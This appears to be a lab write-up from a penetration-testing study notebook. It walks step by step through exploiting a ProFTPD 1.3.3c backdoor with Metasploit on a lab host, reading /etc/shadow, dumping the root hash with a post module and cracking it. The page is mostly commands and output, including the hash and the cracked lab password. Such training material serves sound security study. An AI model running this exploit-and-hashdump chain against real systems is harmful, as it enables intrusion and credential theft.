🔬Hashes Dumping

Lab 1

🔬
Target IP: 192.75.64.3
Password Hashes dumping - /etc/shadow

Enumeration

ip -br -c a
	192.75.64.2/24

nmap -sV 192.75.64.3

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
MAC Address: 02:42:C0:4B:40:03 (Unknown)
Service Info: OS: Unix

searchsploit ProFTPD 1.3.3

Exploitation

service postgresql start && msfconsole -q

setg RHOSTS 192.75.64.3
search proftpd
use exploit/unix/ftp/proftpd_133c_backdoor
run

/bin/bash -i

Upgrade the sessions to a meterpreter session

# background the session with CTRL+Z
sessions -u 1
sessions 2

Hashes Dumping

cat /etc/shadow

📌 root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.

Gather Linux Password hashes with Metasploit

# background the session with CTRL+Z
search hashdump
use post/linux/gather/hashdump
set SESSION 2
run

[+] root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:0:0:root:/root:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20230323100234_default_192.75.64.3_linux.hashes_660271.txt

The unshadowed password file is a file containing the format hashed password, ready to be cracked.

Crack the Hash

search crack
use auxiliary/analyze/crack_linux
set SHA512 true
run

Reveal Flag - "root" password is: 🚩

password

Previous🔬SUID NextNetwork Based Attacks

Last updated 2 years ago

Was this helpful?